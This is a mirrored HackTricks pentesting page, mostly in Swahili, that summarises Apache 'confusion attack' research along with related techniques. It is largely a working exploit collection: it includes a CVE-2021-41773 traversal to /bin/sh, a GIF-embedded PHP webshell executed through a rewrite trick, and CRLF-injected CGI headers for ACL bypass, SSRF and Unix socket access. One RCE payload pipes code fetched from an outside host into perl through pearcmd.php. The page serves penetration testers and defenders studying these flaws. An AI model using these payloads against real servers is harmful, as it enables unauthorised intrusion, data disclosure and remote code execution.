maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/apache.md

247 lines
12 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache
{{#include ../../banners/hacktricks-training.md}}
## Extensions za PHP zinazoweza kutekelezwa
Angalia ni extensions gani zinazoendesha seva ya Apache. Ili kuzitafuta unaweza kutekeleza:
```bash
grep -R -B1 "httpd-php" /etc/apache2
```
Pia, baadhi ya maeneo ambapo unaweza kupata usanidi huu ni:
```bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
```
## CVE-2021-41773
```bash
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```
## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
Aina hizi za mashambulizi zimeanzishwa na kuandikwa [**na Orange katika chapisho hili la blog**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) na yafuatayo ni muhtasari. Shambulizi la "confusion" kimsingi linatumia jinsi moduli kumi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawa na kufanya baadhi yao kubadilisha data zisizotarajiwa kunaweza kusababisha udhaifu katika moduli inayofuata.
### Filename Confusion
#### Truncation
**`mod_rewrite`** itakata maudhui ya `r->filename` baada ya herufi `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). Hii si sahihi kabisa kwani moduli nyingi zitachukulia `r->filename` kama URL. Lakini katika matukio mengine hii itachukuliwa kama njia ya faili, ambayo itasababisha tatizo.
- **Path Truncation**
Inawezekana kutumia vibaya `mod_rewrite` kama katika mfano wa sheria ifuatayo ili kufikia faili nyingine ndani ya mfumo wa faili, kuondoa sehemu ya mwisho ya njia inayotarajiwa kwa kuongeza tu `?`:
```bash
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`
# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
- **Kuweka Upya Kiwango cha RewriteFlag**
Katika sheria ifuatayo ya kuandika upya, mradi tu URL inamalizika na .php itachukuliwa na kutekelezwa kama php. Hivyo, inawezekana kutuma URL inayomalizika na .php baada ya herufi `?` wakati wa kupakia katika njia aina tofauti ya faili (kama picha) yenye msimbo mbaya wa php ndani yake:
```bash
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>
# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
#### **ACL Bypass**
Inawezekana kufikia faili ambazo mtumiaji hapaswi kuwa na uwezo wa kufikia hata kama ufikiaji unapaswa kukataliwa na mipangilio kama:
```xml
<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>
```
Hii ni kwa sababu kwa default PHP-FPM itapokea URLs zinazomalizika na `.php`, kama `http://server/admin.php%3Fooo.php` na kwa sababu PHP-FPM itafuta chochote baada ya herufi `?`, URL ya awali itaruhusu kupakia `/admin.php` hata kama sheria ya awali ilikataza.
### DocumentRoot Confusion
```bash
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```
A fun fact about Apache is that the previous rewrite will try to access the file from both the documentRoot and from root. So, a request to `https://server/abouth.html` will check for the file in `/var/www/html/about.html` and `/about.html` in the file system. Which basically can be abused to access files in the file system.
#### **Server-Side Source Code Disclosure**
- **Disclose CGI Source Code**
Just adding a %3F at the end is enough to leak the source code of a cgi module:
```bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi
```
- **Fichua Msimbo wa Chanzo wa PHP**
Ikiwa seva ina maeneo tofauti na moja yao ikiwa ni eneo la kudumu, hii inaweza kutumika vibaya kuvuka mfumo wa faili na kufichua msimbo wa php:
```bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php
```
#### **Usimamizi wa Vifaa vya Mitaa**
Shida kuu na shambulio la awali ni kwamba kwa kawaida ufikiaji mwingi juu ya mfumo wa faili utawekewa vizuizi kama ilivyo katika [kigezo cha usanidi](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115) cha Apache HTTP Server:
```xml
<Directory />
AllowOverride None
Require all denied
</Directory>
```
Hata hivyo, [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) mifumo ya uendeshaji kwa default inaruhusu `/usr/share`:
```xml
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
```
Kwa hivyo, itakuwa inawezekana **kudhulumu faili zilizoko ndani ya `/usr/share` katika usambazaji hizi.**
**Gadget ya Mitaa kwa Ufunuo wa Taarifa**
- **Apache HTTP Server** na **websocketd** inaweza kufichua **dump-env.php** script kwenye **/usr/share/doc/websocketd/examples/php/**, ambayo inaweza kuvuja mabadiliko ya mazingira ya nyeti.
- Seva zenye **Nginx** au **Jetty** zinaweza kufichua taarifa nyeti za programu za wavuti (mfano, **web.xml**) kupitia mizizi yao ya wavuti ya kawaida iliyowekwa chini ya **/usr/share**:
- **/usr/share/nginx/html/**
- **/usr/share/jetty9/etc/**
- **/usr/share/jetty9/webapps/**
**Gadget ya Mitaa kwa XSS**
- Kwenye Ubuntu Desktop yenye **LibreOffice imewekwa**, kudhulumu kipengele cha kubadilisha lugha za faili za msaada kunaweza kusababisha **Cross-Site Scripting (XSS)**. Kubadilisha URL kwenye **/usr/share/libreoffice/help/help.html** kunaweza kuelekeza kwenye kurasa za uhalifu au toleo la zamani kupitia **unsafe RewriteRule**.
**Gadget ya Mitaa kwa LFI**
- Ikiwa PHP au pakiti fulani za mbele kama **JpGraph** au **jQuery-jFeed** zimewekwa, faili zao zinaweza kudhulumiwa kusoma faili nyeti kama **/etc/passwd**:
- **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
- **/usr/share/javascript/jquery-jfeed/proxy.php**
- **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
**Gadget ya Mitaa kwa SSRF**
- Kutumia **MagpieRSS's magpie_debug.php** kwenye **/usr/share/php/magpierss/scripts/magpie_debug.php**, udhaifu wa SSRF unaweza kuundwa kwa urahisi, ukitoa lango kwa udhalilishaji zaidi.
**Gadget ya Mitaa kwa RCE**
- Fursa za **Remote Code Execution (RCE)** ni nyingi, na usakinishaji dhaifu kama **PHPUnit** ya zamani au **phpLiteAdmin**. Hizi zinaweza kudhulumiwa kutekeleza msimbo wa kiholela, ikionyesha uwezo mkubwa wa kudhulumu gadget za ndani.
#### **Jailbreak kutoka kwa Gadget za Mitaa**
Pia inawezekana kufanya jailbreak kutoka kwenye folda zilizoruhusiwa kwa kufuata symlinks zilizoundwa na programu zilizowekwa katika folda hizo, kama:
- **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
- **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
- **Solr Config**: `/usr/share/solr/conf/` -> `/etc/solr/conf/`
- **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
- **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
Zaidi ya hayo, kudhulumu symlinks ilikuwa inawezekana kupata **RCE katika Redmine.**
### Handler Confusion <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
Shambulio hili linatumia mchanganyiko wa kazi kati ya `AddHandler` na `AddType` directives, ambazo zote zinaweza kutumika **kuwezesha usindikaji wa PHP**. Awali, directives hizi zilihusisha maeneo tofauti (`r->handler` na `r->content_type` mtawalia) katika muundo wa ndani wa seva. Hata hivyo, kutokana na msimbo wa urithi, Apache inashughulikia directives hizi kwa kubadilishana chini ya hali fulani, ikigeuza `r->content_type` kuwa `r->handler` ikiwa ya kwanza imewekwa na ya pili haijawa.
Zaidi ya hayo, katika Apache HTTP Server (`server/config.c#L420`), ikiwa `r->handler` iko tupu kabla ya kutekeleza `ap_run_handler()`, seva **inatumia `r->content_type` kama handler**, kwa ufanisi ikifanya `AddType` na `AddHandler` kuwa sawa katika athari.
#### **Overwrite Handler ili Kufichua Msimbo wa PHP**
Katika [**hii hotuba**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), ilionyeshwa udhaifu ambapo `Content-Length` isiyo sahihi iliyotumwa na mteja inaweza kusababisha Apache kurudisha **msimbo wa PHP** kwa makosa. Hii ilikuwa kwa sababu ya tatizo la kushughulikia makosa na ModSecurity na Apache Portable Runtime (APR), ambapo jibu mara mbili linaweza kusababisha kuandika upya `r->content_type` kuwa `text/html`.\
Kwa sababu ModSecurity haiwezi kushughulikia vizuri thamani za kurudi, itarudisha msimbo wa PHP na haitautafsiri.
#### **Overwrite Handler kwa XXXX**
TODO: Orange hajafichua udhaifu huu bado
### **Kuitisha Handlers za Kiholela**
Ikiwa mshambuliaji anaweza kudhibiti **`Content-Type`** header katika jibu la seva atakuwa na uwezo wa **kuitisha handlers za moduli za kiholela**. Hata hivyo, kwa hatua ambayo mshambuliaji anadhibiti hii, mchakato mwingi wa ombi utakuwa umekamilika. Hata hivyo, inawezekana **kuanzisha upya mchakato wa ombi kwa kudhulumu `Location` header** kwa sababu ikiwa **r**eturned `Status` ni 200 na `Location` header inaanza na `/`, jibu linachukuliwa kama Uelekeo wa Seva na linapaswa kushughulikiwa.
Kulingana na [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification kuhusu CGI) katika [Sehemu 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) inafafanua tabia ya Jibu la Uelekeo wa Mitaa:
> Skripti ya CGI inaweza kurudisha njia ya URI na mfuatano wa swali (local-pathquery) kwa rasilimali ya ndani katika uwanja wa header wa Location. Hii inaashiria kwa seva kwamba inapaswa kuendelea kushughulikia ombi kwa kutumia njia iliyotajwa.
Kwa hivyo, ili kutekeleza shambulio hili inahitajika moja ya udhaifu ufuatao:
- CRLF Injection katika vichwa vya jibu vya CGI
- SSRF kwa udhibiti kamili wa vichwa vya jibu
#### **Handler ya Kiholela kwa Ufunuo wa Taarifa**
Kwa mfano `/server-status` inapaswa kuwa inapatikana tu kwa ndani:
```xml
<Location /server-status>
SetHandler server-status
Require local
</Location>
```
Inawezekana kuipata kwa kuweka `Content-Type` kuwa `server-status` na kichwa cha Location kinachoanza na `/`
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
```
#### **Mshughulikiaji wa Kawaida kwa SSRF Kamili**
Kuelekeza kwa `mod_proxy` ili kufikia protokali yoyote kwenye URL yoyote:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a
```
Hata hivyo, kichwa cha `X-Forwarded-For` kinajumuishwa kuzuia ufikiaji wa mwisho wa metadata ya wingu.
#### **Mshughulikiaji wa Kijazaji ili Kufikia Socket ya Kihali ya Unix ya Mitaa**
Fikia Socket ya Kihali ya Unix ya PHP-FPM ili kutekeleza backdoor ya PHP iliyoko katika `/tmp/`:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a
```
#### **Mshughulikiaji wa Hali ya Juu kwa RCE**
Picha rasmi ya [PHP Docker](https://hub.docker.com/_/php) inajumuisha PEAR (`Pearcmd.php`), chombo cha usimamizi wa pakiti za PHP cha mstari wa amri, ambacho kinaweza kutumika vibaya kupata RCE:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```
Angalia [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), iliyoandikwa na [Phith0n](https://x.com/phithon_xg) kwa maelezo ya mbinu hii.
## Marejeleo
- [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink